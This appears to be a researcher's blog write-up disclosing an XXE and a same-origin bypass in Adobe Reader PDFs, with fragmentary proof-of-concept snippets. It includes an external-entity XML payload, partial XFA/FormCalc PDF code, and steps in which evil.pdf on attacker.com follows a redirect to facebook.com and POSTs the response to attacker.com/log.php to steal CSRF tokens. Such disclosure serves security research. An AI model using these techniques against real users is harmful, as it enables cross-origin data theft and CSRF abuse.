PDF Upload - XXE and CORS bypass
Status: Fixed Reality: Not Fixed This one is about a simple XXE I discovered. I read the paper "Polyglots: Crossing Origins by Crossing Formats", where they discussed a vulnerability in XMLData.parse. It was possible to use external entities and reference them. I read the specification and it turns out there are more functions than "parse" to read XML. I created a simple xml file, which references an url from the same domain and parsed it with loadXML. It worked:
7 0 obj
var cXMLDoc = '<?xml version="1.0" encoding="ISO-8859-1"?><foo>muh</foo>'
var cXMLDoc2 = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ENTITY aaaa SYSTEM "http://example.com">]><ab>&aaaa;</ab>'
xml = XMLData.parse(cXMLDoc,false);
The Impact is limited because o) it is limited to same origin o) HTML Pages break the xml o) Dynamic Entities are not supported o) I had the idea to use a utf-16 xml to avoid breaking the xml structure, but I it didn't work. But it still can be used to read JSON.
% a PDF file using an XFA
% most whitespace can be removed (truncated to 570 bytes or so...)
% Ange Albertini BSD Licence 2012
% modified by insertscript
%PDF-1. % can be truncated to %PDF-\0
1 0 obj <<>>
<field id="Hello World!">
var content = GET("myfriends.php");
/XFA 1 0 R
After I found these functions, I found a same origin policy bypass. This makes it possible to use a victim browser as a proxy (@beef still working on the module^^) The bypass is really simple: 1. User A loads evil.pdf from http://attacker.com/evil.pdf 2. Evil.pdf uses formcalc GET to read http://attacker.com/redirect.php 3. redirect.php redirects with 301 to http://facebook.com 4. Adobe reader will follow and read the response without looking for a crossdomain.xml. 5. evil.pdf sends the content retrieved via POST to http://attacker.com/log.php
Note that using this technique you can steal the CRSF tokens of a page and abuse CSRF vulns.
This simple bypass is fixed now. I hope they going to implement a dialog warning for same origin requests too.